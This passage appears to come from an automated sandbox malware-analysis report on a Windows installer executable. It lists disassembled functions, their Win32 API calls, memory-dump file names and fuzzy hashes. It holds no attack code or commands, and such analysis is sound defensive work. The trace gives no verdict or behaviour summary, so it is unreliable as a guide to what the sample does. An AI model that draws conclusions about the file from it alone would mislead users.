                                                                            • Part of subcall function 004049C4: SetDlgItemTextA.USER32(?,0042A890), ref: 00404A7D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                          • String ID: A$C:\Users\user\tranchet$Call
                                                                          • API String ID: 2624150263-2053375459
                                                                          • Opcode ID: 22496922587a79a87c82097af160ec6f00736279c4fa3eb8ac5991cd3654d7e0
                                                                          • Instruction ID: 02b07c61478aeb9ac600f99876a590f4236d4304051c708c1213a6c52027fc1c
                                                                          • Opcode Fuzzy Hash: 22496922587a79a87c82097af160ec6f00736279c4fa3eb8ac5991cd3654d7e0
                                                                          • Instruction Fuzzy Hash: CAA16FB1900209ABDB11EFA6DD45AAF77B8EF84314F14843BF601B62D1DB7C89418B69
                                                                          Function 700E1A98 Relevance: 20.1, APIs: 13, Instructions: 591stringlibrarymemoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 700E1215: GlobalAlloc.KERNEL32(00000040,700E1233,?,700E12CF,-700E404B,700E11AB,-000000A0), ref: 700E121D
                                                                          • GlobalAlloc.KERNEL32(00000040,000014A4), ref: 700E1BC4
                                                                          • lstrcpyA.KERNEL32(00000008,?), ref: 700E1C0C
                                                                          • lstrcpyA.KERNEL32(00000408,?), ref: 700E1C16
                                                                          • GlobalFree.KERNEL32(00000000), ref: 700E1C29
                                                                          • GlobalFree.KERNEL32(?), ref: 700E1D09
                                                                          • GlobalFree.KERNEL32(?), ref: 700E1D0E
                                                                          • GlobalFree.KERNEL32(?), ref: 700E1D13
                                                                          • GlobalFree.KERNEL32(00000000), ref: 700E1EFA
                                                                          • lstrcpyA.KERNEL32(?,?), ref: 700E2098
                                                                          • GetModuleHandleA.KERNEL32(00000008), ref: 700E2114
                                                                          • LoadLibraryA.KERNEL32(00000008), ref: 700E2125
                                                                          • GetProcAddress.KERNEL32(?,?), ref: 700E217E
                                                                          • lstrlenA.KERNEL32(00000408), ref: 700E2198
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2805650198.00000000700E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 700E0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2805623249.00000000700E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2805669903.00000000700E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2805690432.00000000700E5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_700e0000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                          • String ID:
                                                                          • API String ID: 245916457-0
                                                                          • Opcode ID: d8b8d17d68bd0624a19033669b61e021132add5b717075ef20d5c7219683060a
                                                                          • Instruction ID: b79c79dcf004a5cae387eb7208b4efded1171ab4e3ea6636b71c3ea77b4fe03e
                                                                          • Opcode Fuzzy Hash: d8b8d17d68bd0624a19033669b61e021132add5b717075ef20d5c7219683060a
                                                                          • Instruction Fuzzy Hash: 93229F71D04209DEDB21AFB6C8847EDBBF6BB04B25F2045AED156F2381D7745A81CB90
                                                                          Function 00406945 Relevance: .3, Instructions: 334COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                                          • Instruction ID: f64ed9f862d89b69eb15ddc430260785fe10463149b241517d112065bf602f9e
                                                                          • Opcode Fuzzy Hash: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                                          • Instruction Fuzzy Hash: 57E19BB190070ACFDB24CF59C880BAAB7F5EB45305F15892EE497A7291D378AA51CF14
                                                                          Function 0040711C Relevance: .3, Instructions: 300COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                                          • Instruction ID: 8f207273dfcdbc59f762b6c847d1a58b94b1624b669f9e87ec0d9a9138a8e2bc
                                                                          • Opcode Fuzzy Hash: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                                          • Instruction Fuzzy Hash: 0DC15A31E04259CBCF18CF68D4905EEBBB2BF98314F25826AD8567B380D734A942CF95
                                                                          Function 00404B80 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 491windowmemoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404B97
                                                                          • GetDlgItem.USER32(?,00000408), ref: 00404BA4
                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BF3
                                                                          • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404C0A
                                                                          • SetWindowLongA.USER32(?,000000FC,00405192), ref: 00404C24
                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C36
                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404C4A
                                                                          • SendMessageA.USER32(?,00001109,00000002), ref: 00404C60
                                                                          • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404C6C
                                                                          • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404C7C
                                                                          • DeleteObject.GDI32(00000110), ref: 00404C81
                                                                          • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404CAC
                                                                          • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404CB8
                                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D52
                                                                          • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404D82
                                                                            • Part of subcall function 004041B0: SendMessageA.USER32(00000028,?,00000001,00403FE0), ref: 004041BE
                                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404D96
                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 00404DC4
                                                                          • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404DD2
                                                                          • ShowWindow.USER32(?,00000005), ref: 00404DE2
                                                                          • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404EDD
                                                                          • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404F42
                                                                          • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404F57
                                                                          • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404F7B
                                                                          • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404F9B
                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404FB0
                                                                          • GlobalFree.KERNEL32(?), ref: 00404FC0
                                                                          • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00405039
                                                                          • SendMessageA.USER32(?,00001102,?,?), ref: 004050E2
                                                                          • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004050F1
                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0040511B
                                                                          • ShowWindow.USER32(?,00000000), ref: 00405169
                                                                          • GetDlgItem.USER32(?,000003FE), ref: 00405174
                                                                          • ShowWindow.USER32(00000000), ref: 0040517B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                          • String ID: $M$N
                                                                          • API String ID: 2564846305-813528018
                                                                          • Opcode ID: fdda06af448e6c65fc04a67e7919175d0af5b83356ee1959317fb13923aa2151
                                                                          • Instruction ID: 99b70255f3faedab1c4ad885451b662392dfc0d6b29454a89b749d4faaca394f
                                                                          • Opcode Fuzzy Hash: fdda06af448e6c65fc04a67e7919175d0af5b83356ee1959317fb13923aa2151
                                                                          • Instruction Fuzzy Hash: 5D027DB0A00209AFDB20DF94DD85AAE7BB5FB44354F50813AF610BA2E0D7798D52CF58
                                                                          Function 00403CA7 Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CE3
                                                                          • ShowWindow.USER32(?), ref: 00403D00
                                                                          • DestroyWindow.USER32 ref: 00403D14
                                                                          • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403D30
                                                                          • GetDlgItem.USER32(?,?), ref: 00403D51
                                                                          • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403D65
                                                                          • IsWindowEnabled.USER32(00000000), ref: 00403D6C
                                                                          • GetDlgItem.USER32(?,00000001), ref: 00403E1A
                                                                          • GetDlgItem.USER32(?,00000002), ref: 00403E24
                                                                          • SetClassLongA.USER32(?,000000F2,?), ref: 00403E3E
                                                                          • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403E8F
                                                                          • GetDlgItem.USER32(?,00000003), ref: 00403F35
                                                                          • ShowWindow.USER32(00000000,?), ref: 00403F56
                                                                          • EnableWindow.USER32(?,?), ref: 00403F68
                                                                          • EnableWindow.USER32(?,?), ref: 00403F83
                                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F99
                                                                          • EnableMenuItem.USER32(00000000), ref: 00403FA0
                                                                          • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403FB8
                                                                          • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403FCB
                                                                          • lstrlenA.KERNEL32(0042A890,?,0042A890,00000000), ref: 00403FF5
                                                                          • SetWindowTextA.USER32(?,0042A890), ref: 00404004
                                                                          • ShowWindow.USER32(?,0000000A), ref: 00404138
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                          • String ID:
                                                                          • API String ID: 184305955-0
                                                                          • Opcode ID: f90a3406d0b8a8c4b834731162917c717653151454b1dbe7dd2907c4aa61ec43
                                                                          • Instruction ID: 5e2b37e592d4e435839d8b6e88a40281f914ef55e2ab9fcffeaa2cd4c4a1132c
                                                                          • Opcode Fuzzy Hash: f90a3406d0b8a8c4b834731162917c717653151454b1dbe7dd2907c4aa61ec43
                                                                          • Instruction Fuzzy Hash: 45C1D271600204AFDB21AF62ED88D2B3ABCEB95706F50053EF641B51F0CB799892DB1D
                                                                          Function 004042E6 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202windowstringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404371
                                                                          • GetDlgItem.USER32(00000000,000003E8), ref: 00404385
                                                                          • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004043A3
                                                                          • GetSysColor.USER32(?), ref: 004043B4
                                                                          • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004043C3
                                                                          • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004043D2
                                                                          • lstrlenA.KERNEL32(?), ref: 004043D5
                                                                          • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004043E4
                                                                          • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004043F9
                                                                          • GetDlgItem.USER32(?,0000040A), ref: 0040445B
                                                                          • SendMessageA.USER32(00000000), ref: 0040445E
                                                                          • GetDlgItem.USER32(?,000003E8), ref: 00404489
                                                                          • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004044C9
                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 004044D8
                                                                          • SetCursor.USER32(00000000), ref: 004044E1
                                                                          • LoadCursorA.USER32(00000000,00007F00), ref: 004044F7
                                                                          • SetCursor.USER32(00000000), ref: 004044FA
                                                                          • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404526
                                                                          • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040453A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                          • String ID: Call$N
                                                                          • API String ID: 3103080414-3438112850
                                                                          • Opcode ID: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                                                                          • Instruction ID: 2ba0dcbd17e821031ba3c657239c4b48ae58aa12c0a6ed8defdb88479dfe25c9
                                                                          • Opcode Fuzzy Hash: 745d5685d33c6010513eb6a6e6710873411dad37f80b0c9191fb1ce11dc8c820
                                                                          • Instruction Fuzzy Hash: CC61C2B1A00209BFDF10AF61DD45F6A3B69EB94754F00803AFB04BA1D1C7B8A951CF98
                                                                          Function 00401000 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                          • DrawTextA.USER32(00000000,datastrrelsers Setup,000000FF,00000010,00000820), ref: 00401156
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                          • String ID: F$datastrrelsers Setup
                                                                          • API String ID: 941294808-580256567
                                                                          • Opcode ID: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                                                                          • Instruction ID: fc049dc8deed713fddbaab3278265d12b48f61153473f3c5d5e2d7be2f7e1970
                                                                          • Opcode Fuzzy Hash: bb71a3ab4a4fa1f895d534f8b47170c1d9b9c824dc85430c64170ade6c4bb6c2
                                                                          • Instruction Fuzzy Hash: 33417D71400249AFCF058FA5DE459AFBFB9FF44314F00802AF591AA1A0CB74D955DFA4
                                                                          Function 00405D66 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405EF7,?,?), ref: 00405D97
                                                                          • GetShortPathNameA.KERNEL32(?,0042C620,00000400), ref: 00405DA0
                                                                            • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C05
                                                                            • Part of subcall function 00405BF5: lstrlenA.KERNEL32(00000000,?,00000000,00405E50,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C37
                                                                          • GetShortPathNameA.KERNEL32(?,0042CA20,00000400), ref: 00405DBD
                                                                          • wsprintfA.USER32 ref: 00405DDB
                                                                          • GetFileSize.KERNEL32(00000000,00000000,0042CA20,C0000000,00000004,0042CA20,?,?,?,?,?), ref: 00405E16
                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E25
                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E5D
                                                                          • SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,0042C220,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 00405EB3
                                                                          • GlobalFree.KERNEL32(00000000), ref: 00405EC4
                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405ECB
                                                                            • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\Osb7hkGfAb.exe,80000000,00000003), ref: 00405C94
                                                                            • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                          • String ID: %s=%s$[Rename]
                                                                          • API String ID: 2171350718-1727408572
                                                                          • Opcode ID: bb326c4fff2569f995f741f5889aaa438d16cb529eb983989e6eb254c782141b
                                                                          • Instruction ID: 2ccb2bf8dd744840d543bbc1a34bde763c5e5f86f0f2c8118c993f85f4779e4e
                                                                          • Opcode Fuzzy Hash: bb326c4fff2569f995f741f5889aaa438d16cb529eb983989e6eb254c782141b
                                                                          • Instruction Fuzzy Hash: 39310531600B15ABC2206B659D48F6B3A5CDF45755F14043BB981F62C2DF7CE9028AFD
                                                                          Function 700E22F1 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GlobalFree.KERNEL32(00000000), ref: 700E2447
                                                                            • Part of subcall function 700E1224: lstrcpynA.KERNEL32(00000000,?,700E12CF,-700E404B,700E11AB,-000000A0), ref: 700E1234
                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 700E23C2
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 700E23D7
                                                                          • GlobalAlloc.KERNEL32(00000040,00000010), ref: 700E23E8
                                                                          • CLSIDFromString.OLE32(00000000,00000000), ref: 700E23F6
                                                                          • GlobalFree.KERNEL32(00000000), ref: 700E23FD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2805650198.00000000700E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 700E0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2805623249.00000000700E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2805669903.00000000700E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2805690432.00000000700E5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_700e0000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                          • String ID: @H1v
                                                                          • API String ID: 3730416702-3152185570
                                                                          • Opcode ID: 10796e2cfdf63bb06383ff131e8c76e7a7ce5cb3c148ef5a36e9a574cfee5543
                                                                          • Instruction ID: fa1933ac681a0a2ed7fe6a8ca8fcecd4d96e96cba4879585e767406a45c32fde
                                                                          • Opcode Fuzzy Hash: 10796e2cfdf63bb06383ff131e8c76e7a7ce5cb3c148ef5a36e9a574cfee5543
                                                                          • Instruction Fuzzy Hash: 304168B1504200EFE321BF32CC84B6E77F9FB40A31F20496EF556A66A1D734AA048F61
                                                                          Function 004063D2 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Osb7hkGfAb.exe",774D3410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                                          • CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                                          • CharNextA.USER32(?,"C:\Users\user\Desktop\Osb7hkGfAb.exe",774D3410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
